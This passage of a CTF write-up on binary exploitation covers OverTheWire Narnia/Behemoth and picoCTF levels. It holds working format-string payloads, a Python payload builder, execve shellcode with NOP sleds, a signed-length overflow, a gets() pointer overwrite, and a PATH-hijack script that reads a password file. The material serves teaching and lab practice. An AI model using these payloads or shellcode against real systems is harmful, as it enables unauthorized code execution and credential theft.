The reason I have shown two runs is that in the first one the two addresses differ by only one byte (0x1f and 0x45), whereas in the second one they differ by two bytes (0x86e0 and 0x8706). We can write two bytes with %hn and one byte with %hhn. We can write a whole 4-byte address by following this formula
If HOB < LOB
HOB: 0x0804
LOB: 0x8706
[addr+2][addr] = \x4e\xd6\xff\xff\x4c\xd6\xff\xff
%.[HOB - 8]x = 0x804 - 8 = 7FC (2044) = %.2044x
%[offset]$hn = %6\$hn
%.[LOB - HOB]x = 0x8706 - 0x804 = 7F02 (32514) = %.32514x
%[offset+1]$hn = %7\$hn
`python -c 'print "\x4e\xd6\xff\xff\x4c\xd6\xff\xff" +"%.2044x%6\$hn %.32514x%7\$hn"'`

We also need to find the offset at which the address is stored, which can be done in two ways: either by compiling the program on a local machine and checking the buffer just after snprintf
gdb-peda$ p buffer
$2 = "AAAA.000008a2.f7fdeb58.f7fde860.0804835c.0804871f.41414141.3030302e.61383030", '\000' <repeats 51 times>

or by using ltrace

narnia7@melinda:/narnia$ ltrace ./narnia7 `python -c 'print "AAAA" + ".%08x"*7'`
__libc_start_main(0x804868f, 2, 0xffffd764, 0x8048740 <unfinished ...>
memset(0xffffd620, '\0', 128) = 0xffffd620
printf("goodfunction() = %p\n", 0x80486e0goodfunction() = 0x80486e0
) = 27
) = 30
printf("before : ptrf() = %p (%p)\n", 0x80486e0, 0xffffd61cbefore : ptrf() = 0x80486e0 (0xffffd61c)
) = 41
puts("I guess you want to come to the "...I guess you want to come to the hackedfunction...
printf("hackedfunction() = %p\n\n", 0x8048706hackedfunction() = 0x8048706
) = 50
sleep(2) = 0
snprintf("AAAA.08048238.ffffd678.f7ffda94."..., 128, "AAAA.%08x.%08x.%08x.%08x.%08x.%0"..., 0x8048238, 0xffffd678, 0xf7ffda94, 0, 0x80486e0, 0x41414141, 0x3038302e) = 67
puts("Welcome to the goodfunction, but"...Welcome to the goodfunction, but i said the Hackedfunction..
) = 61
fflush(0xf7fcaac0) = 0
exit(0 <no return ...>
+++ exited (status 0) +++

As you can see, 0x41414141 is at offset 6.
gdb-peda$ p ptrf
$3 = (int (*)()) 0x804871f <goodfunction>
gdb-peda$ p &ptrf
$4 = (int (**)()) 0xffffd2ec
gdb-peda$ x /10xb 0xfffd3ea
0xfffd3ea: Cannot access memory at address 0xfffd3ea
gdb-peda$ x /10xb 0xffffd3ea
0xffffd3ea: 0x3f 0x77 0x00 0x00 0x00 0x00 0x00 0x00
0xffffd3f2: 0x00 0x00
gdb-peda$ x /10xb 0xffffd2ea
0xffffd2ea: 0x04 0x08 0x1f 0x87 0x04 0x08 0x41 0x41
0xffffd2f2: 0x41 0x41
gdb-peda$ p goodfunction
$5 = {int ()} 0x804871f <goodfunction>
gdb-peda$ p ha
hackedfunction hasmntopt
gdb-peda$ p hackedfunction
$6 = {int ()} 0x8048745 <hackedfunction>

gdb-peda$ p &ptrf
$10 = (int (**)()) 0xffffd2fc
gdb-peda$ run `python -c 'print "\xfc\xd2\xff\xff" + ".%08x"*5 + "%hhn"'`
gdb-peda$ p ptrf
$12 = (int (*)()) 0x8048731 <goodfunction+18>
gdb-peda$ x /10xb 0xffffd2fa
0xffffd2fa: 0x04 0x08 0x31 0x87 0x04 0x08 0xfc 0xd2
0xffffd302: 0xff 0xff
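The HOB/LOB formula used for Narnia7 above can be turned into a small helper. This is a sketch under assumptions, not the exact payload from the write-up: it targets 32-bit little-endian, places the two addresses at the very start of the format string, emits no separator between the two writes so that the counts match the formula exactly, and always writes the smaller half first. The name `two_short_writes` is hypothetical.

```python
import struct


def two_short_writes(addr: int, value: int, offset: int) -> bytes:
    """Build a format string that writes `value` to `addr` with two %hn."""
    hob = (value >> 16) & 0xFFFF   # high-order 16 bits, stored at addr + 2
    lob = value & 0xFFFF           # low-order 16 bits, stored at addr
    # Write the smaller half first so the running count only has to grow.
    (first_val, first_addr), (second_val, second_addr) = sorted(
        [(hob, addr + 2), (lob, addr)]
    )
    pad1 = first_val - 8           # 8 bytes of addresses are already printed
    pad2 = second_val - first_val
    if pad1 < 8 or pad2 < 8:
        # %.Nx prints exactly N digits only when N >= 8 for 32-bit values.
        raise ValueError("halves too small or too close for this simple sketch")
    head = struct.pack("<I", first_addr) + struct.pack("<I", second_addr)
    fmt = "%.{}x%{}$hn%.{}x%{}$hn".format(pad1, offset, pad2, offset + 1)
    return head + fmt.encode()


# Values from the Narnia7 run: ptrf at 0xffffd64c, hackedfunction at 0x8048706
payload = two_short_writes(0xFFFFD64C, 0x08048706, 6)
print(payload)
```

For these inputs the helper yields the same addresses and the same 2044 and 32514 paddings as the worked formula.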
Let’s see another example, Behemoth3, where we have only the assembly code of the program. We exploit it in two ways: by overwriting the return address, or by overwriting a GOT entry.
Assembly Source Code:
(gdb) disassemble main
Dump of assembler code for function main:
0x0804847d <+0>: push %ebp
0x0804847e <+1>: mov %esp,%ebp
0x08048480 <+3>: and $0xfffffff0,%esp
0x08048483 <+6>: sub $0xe0,%esp
0x08048489 <+12>: movl $0x8048570,(%esp)
0x08048490 <+19>: call 0x8048330 <printf@plt>
0x08048495 <+24>: mov 0x80497a4,%eax
0x0804849a <+29>: mov %eax,0x8(%esp)
0x0804849e <+33>: movl $0xc8,0x4(%esp)
0x080484a6 <+41>: lea 0x18(%esp),%eax
0x080484aa <+45>: mov %eax,(%esp)
0x080484ad <+48>: call 0x8048340 <fgets@plt>
0x080484b2 <+53>: movl $0x8048584,(%esp)
0x080484b9 <+60>: call 0x8048330 <printf@plt>
0x080484be <+65>: lea 0x18(%esp),%eax
0x080484c2 <+69>: mov %eax,(%esp)
0x080484c5 <+72>: call 0x8048330 <printf@plt>
0x080484ca <+77>: movl $0x804858e,(%esp)
0x080484d1 <+84>: call 0x8048350 <puts@plt>
0x080484d6 <+89>: mov $0x0,%eax
0x080484db <+94>: leave
0x080484dc <+95>: ret
End of assembler dump.

Observed Behavior:
behemoth3@melinda:/tmp/rahul3$ ./behemoth3
Identify yourself: HelloCheck123
Welcome, HelloCheck123

aaaand goodbye again.

We tried to provide a very large input at the Identify yourself prompt, but it didn’t give a segmentation fault. Let’s try a format string:
behemoth3@melinda:/tmp/rahul3$ echo `python -c 'print "A"*4 + ".%08x"*7'` | ./behemoth3
Identify yourself: Welcome, AAAA.000000c8.f7fcac20.00000000.00000000.f7ffd000.41414141.3830252e

aaaand goodbye again.

Trying a simple format string gave us the offset of our input on the stack (0x41414141 is at position 6). Now we can write almost any value to almost any address with our input. Before that, let’s put shellcode in an environment variable and check its address:
export EGG=`python -c 'print "\x90"*90 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`

Let’s core dump the binary using %s and examine the core. Our shellcode can be reached at 0xffffd8f0
Either we can overwrite the return address (main+95): Let’s debug the program, set a breakpoint at main+95 and look at the value at $esp, which will be used to find the return address when the binary is executed without gdb. The value is 0xf7e3ba63, and the stack slot holding the return address, which needs to be overwritten, is 0xffffd65c. Let’s again core dump the binary to see the return address without gdb.

(gdb) find $esp,+2000,0xf7e3ba63
0xffffd66c
1 pattern found.

So, if we overwrite the return address at 0xffffd66c with the address of our shellcode, 0xffffd8f0, we should get a shell.
python -c 'print "\x5e\xd6\xff\xff\x5c\xd6\xff\xff" +"%.65527x%6$hn %.55503x%7$hn"' > input98

This is a little tricky, because we might have to guess the location of the return address without gdb. Inside gdb it was at 0xffffd66c, but we got a shell using 0xffffd65c.
Or we can overwrite the puts GOT entry: Find the GOT address of puts, which is 0x08049790, and overwrite it with
python -c 'print "\x92\x97\x04\x08\x90\x97\x04\x08" +"%.65527x%6$hn %.55503x%7$hn"'
In the code below, if we can somehow set the value of secret to 1337, we get a shell on the system and can read the flag. Also, the printf function directly prints whatever argument the user passes. Using the concepts above, we need to find the address of secret and write to it. The address of secret can be found with gdb or objdump. Either the address is already present on the stack, or it can be put on the stack.
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

int secret = 0;

void give_shell(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

int main(int argc, char **argv){
    int *ptr = &secret;
    printf(argv[1]);

    if (secret == 1337){
        give_shell();
    }
    return 0;
}

Reading the address

pico83515@shell:/home/format$ gdb -q format
Reading symbols from format...(no debugging symbols found)...done.
(gdb) p $secret
$1 = void
(gdb) p &secret
$2 = (<data variable, no debug info> *) 0x804a030 <secret>

Now we have to find out whether this address is already present on the stack. If not, we can put it on the stack ourselves because of the format string vulnerability.

pico83515@shell:/home/format$ ./format %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
ffffd774.ffffd780.f7e4f39d.f7fc83c4.f7ffd000.0804852b.0804a030.08048520.00000000

We see that the address is present on the stack at the seventh position. Otherwise, we can put it on the stack ourselves and look for its offset with
for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x;echo ;done | grep 4141

What this does is extract a particular stack entry with “%$i$x”. As we have seen with DMA, %N$x can be used to read the Nth entry on the stack directly, and here $i runs from 1 to 256. However, as you add more data, the offset of your original input changes, so go ahead and add 1333 more bytes of output and see what the offset is then. (1337 is what we want to put into secret, and we will have written four bytes (AAAA), so 1333+4 = 1337)

for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x%1333u;echo ;done | grep 4141
Offset: 103:AAAA41410074
Offset: 104:AAAA31254141

So we found our A’s again, but they aren’t aligned on the stack. Let’s add two more A’s at the end to see if we can get them to line up.

for i in {1..256};do echo -n "Offset: $i:"; env -i ./format AAAA%$i\$x%1333uAA;echo ;done | grep 41414141
Offset: 103:AAAA41414141

Now our four A’s sit exactly at offset 103. The address we need, 0x0804a030, is the one stored in ptr, so that is what we put in place of our A’s. In order to place the number 1337 into secret’s memory address, we need to use the %n modifier. (%103$n will treat the data located at offset 103 as a memory address, and write the total number of bytes written so far into that address.)
pico1139@shell:/home/format$ env -i ./format $(python -c 'print "\x30\xa0\x04\x08"+"%1333u%103$nAA"')
$ id
uid=11066(pico1139) gid=1008(format) groups=1017(picogroup)
$ ls
Makefile flag.txt format format.c
$ cat flag.txt
who_thought_%n_was_a_good_idea?

Otherwise, as the address is already present on the stack at the seventh position, we can also do
pico83515@shell:/home/format$ ./format "%1337u%7$n"

Here we used DMA to access the memory, writing 1337 directly to the address stored at the 7th position. Otherwise, we can use the basic

./format %08x.%08x.%08x.%08x.%08x.%1292u%n

Here we pop five stack values with “%08x.”, use the 6th position to pad the output up to the value to be written (%1292u), and %n then writes through the 7th position, which contains the address of secret. Each “%08x.” is eight characters plus one “.”, i.e. 9 bytes; used five times that is 9*5 = 45 bytes, and 1292 + 45 = 1337.
In another example below,
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

#define BUFSIZE 256

void greet(int length){
    char buf[BUFSIZE];
    puts("What is your name?");
    read(0, buf, length);
    printf("Hello, %s\n!", buf);
}

void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char **argv){
    int length;
    be_nice_to_people();

    puts("How long is your name?");
    scanf("%d", &length);

    if(length < BUFSIZE) //don't allow buffer overflow
        greet(length);
    else
        puts("Length was too long!");
}

This program tries to prevent buffer overflows by first asking for the input length; it disregards the rest of the input. However, the program reads the length with scanf into a signed int. If we supply -1 as the length, we bypass the overflow check (-1 < 256), and read() then treats the length as a huge unsigned size. readelf -l no_overflow can be used to find out whether there’s any protection on the binary. The stack is executable and, furthermore, ASLR is not enabled. This makes it easy to stick in shellcode plus a NOP sled and return to an address on the stack
pico1139@shell:/home/no_overflow$ (echo -1; python -c 'print "A"*268+"\xd0\xd6\xff\xff"+"\x90"*200+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'; cat) | ./no_overflow
How long is your name?
What is your name?
Hello, AAAAAAAAAAAAAAAAAAAAAA...snip...
id
uid=11066(pico1139) gid=1007(no_overflow) groups=1017(picogroup)
cat flag.txt
what_is_your_sign
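Why -1 slips past the length check can be illustrated with ctypes. This is only a model of the C behaviour, assuming a 32-bit target where size_t is 32 bits wide; `passes_check` and `as_size_t32` are illustrative names, not functions from the challenge.

```python
import ctypes

BUFSIZE = 256


def passes_check(length: int) -> bool:
    """The signed comparison the program performs: length < BUFSIZE."""
    return length < BUFSIZE


def as_size_t32(length: int) -> int:
    """What read() sees once the int is converted to a 32-bit size_t."""
    return ctypes.c_uint32(length).value


for length in (16, 300, -1):
    print(length, passes_check(length), as_size_t32(length))
```

For -1 the check passes, yet the size handed to read() is 4294967295, so read() accepts far more than the 256 bytes that buf can hold.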
In another example, where the stack is not executable, reading the code shows that we need to change file_name from not_the_flag.txt to flag.txt. In this example, we are given the address of the string “not_the_flag.txt” as 0x08048777. By putting a breakpoint on puts in gdb, we can look for the address of flag.txt inside that string.
(gdb) br *puts
Breakpoint 1 at 0x8048460
(gdb) run
Starting program: /home/what_the_flag/what_the_flag
Breakpoint 1, 0xf7e81ee0 in puts () from /lib/i386-linux-gnu/libc.so.6
(gdb) x/s 0x08048777
0x8048777: "not_the_flag.txt"
(gdb) x/s 0x08048778
0x8048778: "ot_the_flag.txt"
(gdb) x/s 0x08048770
0x8048770: "le: %s"
(gdb) x/s 0x0804877C
0x804877c: "he_flag.txt"
(gdb) x/s 0x0804877D
0x804877d: "e_flag.txt"
(gdb) x/s 0x0804877E
0x804877e: "_flag.txt"
(gdb) x/s 0x0804877F
0x804877f: "flag.txt"

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

struct message_data{
    char message[128];
    char password[16];
    char *file_name;
};

void read_file(char *buf, char *file_path, size_t len){
    FILE *file;
    if(file= fopen(file_path, "r")){
        fgets(buf, len, file);
        fclose(file);
    }else{
        sprintf(buf, "Cannot read file: %s", file_path);
    }
}

int main(int argc, char **argv){
    struct message_data data;
    data.file_name = "not_the_flag.txt";

    puts("Enter your password too see the message:");
    gets(data.password);

    if(!strcmp(data.password, "1337_P455W0RD")){
        read_file(data.message, data.file_name, sizeof(data.message));
        puts(data.message);
    }else{
        puts("Incorrect password!");
    }

    return 0;
}

So we’ll overwrite the file_name pointer with 0x804877f to make the program read flag.txt. From the gets() manual: gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte (‘\0’). No check for buffer overrun is performed (see BUGS below). So by using the following input, we can overwrite the file_name pointer and still provide the correct password:
1337_P455W0RD
1337_P455W0RD\0aa\x7f\x87\x04\x08
aa\x7f\x87\x04\x08

We use this on the command line to get the flag

pico83515@shell:/home/what_the_flag$ printf "1337_P455W0RD\0bb\x7f\x87\x04\x08" | ./what_the_flag
Enter your password too see the message:
Congratulations! Here is the flag: who_needs_%eip
pico83515@shell:/home/what_the_flag$
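The layout of that input can be spelled out in Python. This is a sketch that mirrors the struct from the challenge (a 16-byte password field directly followed by the file_name pointer) and assumes a 32-bit little-endian target; the constant and variable names are chosen here for illustration.

```python
import struct

PASSWORD = b"1337_P455W0RD"
PASSWORD_FIELD = 16            # sizeof(data.password) in the struct
NOT_THE_FLAG = 0x08048777      # address of "not_the_flag.txt" given above

# "flag.txt" starts right after the "not_the_" prefix of the same string.
flag_addr = NOT_THE_FLAG + len("not_the_")

payload = PASSWORD + b"\x00"                        # strcmp stops at the NUL
payload += b"b" * (PASSWORD_FIELD - len(payload))   # filler up to 16 bytes
payload += struct.pack("<I", flag_addr)             # overwrites file_name

print(hex(flag_addr))
print(payload)
```

The NUL byte after the password is what lets strcmp succeed while gets() keeps copying the remaining bytes into file_name.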
Miscellaneous Examples
Let’s see some miscellaneous examples that are not buffer overflow or format string vulnerabilities.
So, we have a binary which when executed gives
behemoth2@melinda:/behemoth$ ./behemoth2
touch: cannot touch '13373': Permission denied

Let’s see what ltrace gives us

behemoth2@melinda:/behemoth$ ltrace ./behemoth2
__libc_start_main(0x804856d, 1, 0xffffd794, 0x8048640 <unfinished ...>
getpid() = 14118
sprintf("touch 14118", "touch %d", 14118) = 11
__lxstat(3, "14118", 0xffffd688) = -1
unlink("14118") = -1
system("touch 14118"touch: cannot touch '14118': Permission denied
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 256
sleep(2000

Let’s look at a truncated output of disassemble main. We can see that getpid gets the PID of the process, sprintf writes something into a buffer, lstat provides the file status, and unlink is called to remove the specified file.
(gdb) disassemble main
Dump of assembler code for function main:
0x08048588 <+27>: call 0x8048410 <getpid@plt>
0x080485b3 <+70>: call 0x8048450 <sprintf@plt>
0x080485c7 <+90>: call 0x80486c0 <lstat>
0x080485df <+114>: call 0x8048400 <unlink@plt>
0x080485eb <+126>: call 0x8048420 <system@plt>
0x080485f7 <+138>: call 0x80483e0 <sleep@plt>
0x08048616 <+169>: call 0x8048420 <system@plt>
0x08048635 <+200>: leave
0x08048636 <+201>: ret

If you check the ltrace output

system("touch 14118"touch: cannot touch '14118': Permission denied

touch is being called without an absolute path, so we can take advantage of that. First we’ll create our own touch script that prints out the contents of /etc/behemoth_pass/behemoth3. Next, the PATH variable needs to be updated so that our directory is searched first, to ensure that our touch script is executed and not the actual touch program. With PATH=/tmp:$PATH, you make /tmp the first location searched for binaries, so if you create a file in /tmp/ called touch, that is what gets executed instead of /usr/bin/touch
behemoth2@melinda:/tmp/rahul2$ cat touch
cat /etc/behemoth_pass/behemoth3
behemoth2@melinda:/tmp/rahul2$ history | grep PATH
19 history | grep PATH
behemoth2@melinda:/tmp/rahul2$ PATH=/tmp/rahul2:$PATH /behemoth/behemoth2
**********
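The PATH lookup that makes this trick work can be reproduced harmlessly with Python's shutil.which. This is a minimal sketch assuming a Unix-like system; it creates a throwaway directory containing a fake command and only checks which file the lookup would pick, without running anything. The function name `resolve_with_hijack` is made up for illustration.

```python
import os
import shutil
import tempfile


def resolve_with_hijack(command: str) -> bool:
    """Return True if a fake `command` placed first in PATH wins the lookup."""
    with tempfile.TemporaryDirectory() as fake_dir:
        fake = os.path.join(fake_dir, command)
        with open(fake, "w") as handle:
            handle.write("#!/bin/sh\necho hijacked\n")
        os.chmod(fake, 0o755)  # must be executable to be picked up
        # Same idea as PATH=/tmp/rahul2:$PATH, our directory goes first.
        hijacked_path = fake_dir + os.pathsep + os.environ.get("PATH", "")
        found = shutil.which(command, path=hijacked_path)
        return found == fake


print(resolve_with_hijack("touch"))
```

Because the search stops at the first matching executable, whichever directory comes first in PATH decides which touch a call like system("touch ...") ends up running.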